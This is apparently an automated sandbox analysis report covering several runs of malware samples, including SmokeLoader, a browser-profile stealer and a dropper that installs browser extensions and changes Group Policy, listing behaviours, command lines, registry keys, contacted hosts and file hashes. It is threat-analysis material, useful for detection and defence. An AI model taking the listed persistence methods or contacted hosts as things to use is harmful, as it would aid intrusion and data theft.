Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Network

Country Destination Domain Proto
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp

Files

memory/2324-1-0x00000000002A0000-0x00000000003A0000-memory.dmp

memory/2324-2-0x0000000000400000-0x0000000000443000-memory.dmp

memory/2324-3-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2324-4-0x00000000002A0000-0x00000000003A0000-memory.dmp

memory/2324-5-0x0000000000400000-0x0000000000443000-memory.dmp

memory/2324-6-0x0000000000400000-0x000000000045E000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 168

Network

N/A

Files

memory/2276-1-0x0000000000890000-0x0000000000990000-memory.dmp

memory/2276-3-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2276-2-0x0000000000400000-0x0000000000409000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp

Files

memory/4200-5-0x0000000074FBE000-0x0000000074FBF000-memory.dmp

memory/4200-6-0x0000000000A60000-0x0000000000A68000-memory.dmp

memory/4200-7-0x0000000074FBE000-0x0000000074FBF000-memory.dmp

memory/4200-8-0x0000000074FB0000-0x0000000075760000-memory.dmp

memory/4200-9-0x0000000074FB0000-0x0000000075760000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.151.35:443 www.facebook.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 aaa.apiaaaeg.com udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/2152-0-0x0000000140000000-0x000000014060D000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" -s MYQXM.k

Network

Country Destination Domain Proto
US 76.95.39.48:8080 tcp
US 76.95.39.48:8080 tcp

Files

C:\Users\Admin\AppData\Local\Temp\MYQXM.k

MD5 942afe4b6c981193fda8ede7a57fd5bb
SHA1 62e6bb30e5a02920a3bbb1dffa7bd90d699afcd6
SHA256 99128a36e75d6739f15b1c5e8b40b5afe57740e6bf3d573c8636b26f78b2fb88
SHA512 2089221b9d554e51b016415b7e07c65ee0d76b1d3136a9424a98212ca812cb8d263d716d79cc4addca40f2c67df25ad642dfa903b6a641afba219bd9fc797955

memory/2268-4-0x0000000001EF0000-0x00000000020BA000-memory.dmp

memory/2268-5-0x00000000029D0000-0x0000000002AFE000-memory.dmp

memory/2268-6-0x0000000002C30000-0x0000000002D59000-memory.dmp

memory/2268-8-0x00000000029D0000-0x0000000002AFE000-memory.dmp

memory/2268-7-0x0000000001EF0000-0x00000000020BA000-memory.dmp

memory/2268-9-0x0000000000240000-0x00000000002FD000-memory.dmp

memory/2268-10-0x0000000000390000-0x0000000000439000-memory.dmp

memory/2268-11-0x0000000000390000-0x0000000000439000-memory.dmp

memory/2268-13-0x0000000000390000-0x0000000000439000-memory.dmp

memory/2268-15-0x0000000000390000-0x0000000000439000-memory.dmp

memory/2268-16-0x0000000002D60000-0x0000000004C4F000-memory.dmp

memory/2268-17-0x0000000004C50000-0x0000000004CF2000-memory.dmp

memory/2268-18-0x0000000004D00000-0x0000000004D9C000-memory.dmp

memory/2268-20-0x0000000004D00000-0x0000000004D9C000-memory.dmp

memory/2268-21-0x0000000004D00000-0x0000000004D9C000-memory.dmp

memory/2268-22-0x0000000000090000-0x0000000000091000-memory.dmp

memory/2268-24-0x00000000000A0000-0x00000000000A4000-memory.dmp

memory/2268-33-0x0000000002C30000-0x0000000002D59000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2568 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2568 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" -s MYQXM.k

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 76.95.39.48:8080 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 70.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\MYQXM.k

MD5 942afe4b6c981193fda8ede7a57fd5bb
SHA1 62e6bb30e5a02920a3bbb1dffa7bd90d699afcd6
SHA256 99128a36e75d6739f15b1c5e8b40b5afe57740e6bf3d573c8636b26f78b2fb88
SHA512 2089221b9d554e51b016415b7e07c65ee0d76b1d3136a9424a98212ca812cb8d263d716d79cc4addca40f2c67df25ad642dfa903b6a641afba219bd9fc797955

memory/4644-5-0x0000000001FC0000-0x000000000218A000-memory.dmp

memory/4644-6-0x00000000027F0000-0x000000000291E000-memory.dmp

memory/4644-7-0x0000000002A50000-0x0000000002B79000-memory.dmp

memory/4644-8-0x0000000001FC0000-0x000000000218A000-memory.dmp

memory/4644-9-0x00000000027F0000-0x000000000291E000-memory.dmp

memory/4644-10-0x0000000002B80000-0x0000000002C3D000-memory.dmp

memory/4644-11-0x0000000002C40000-0x0000000002CE9000-memory.dmp

memory/4644-12-0x0000000002C40000-0x0000000002CE9000-memory.dmp

memory/4644-14-0x0000000002C40000-0x0000000002CE9000-memory.dmp

memory/4644-15-0x0000000002C40000-0x0000000002CE9000-memory.dmp

memory/4644-17-0x0000000004BE0000-0x0000000004C82000-memory.dmp

memory/4644-16-0x0000000002CF0000-0x0000000004BDF000-memory.dmp

memory/4644-18-0x0000000004C90000-0x0000000004D2C000-memory.dmp

memory/4644-20-0x0000000004C90000-0x0000000004D2C000-memory.dmp

memory/4644-21-0x0000000004C90000-0x0000000004D2C000-memory.dmp

memory/4644-22-0x00000000000E0000-0x00000000000E1000-memory.dmp

memory/4644-23-0x00000000000F0000-0x00000000000F4000-memory.dmp

memory/4644-30-0x0000000002A50000-0x0000000002B79000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

96s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1008 -ip 1008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 460

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/1008-1-0x0000000000650000-0x0000000000750000-memory.dmp

memory/1008-2-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1008-3-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1008-4-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1008-5-0x0000000000400000-0x0000000000409000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2232 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe
PID 2232 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe
PID 2232 wrote to memory of 2592 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2232 -s 1020

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.151.35:443 www.facebook.com tcp
US 8.8.8.8:53 aaa.apiaaaeg.com udp

Files

memory/2232-0-0x0000000140000000-0x000000014060D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabDE60.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarDE82.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1DEB6997DB25CE8EC844B742DDA6F019 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\LkXFgLD.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\aYvhmsh.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\ICzrjSr.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\phinBxB.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\MWmNKgVxMMUzC.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe N/A
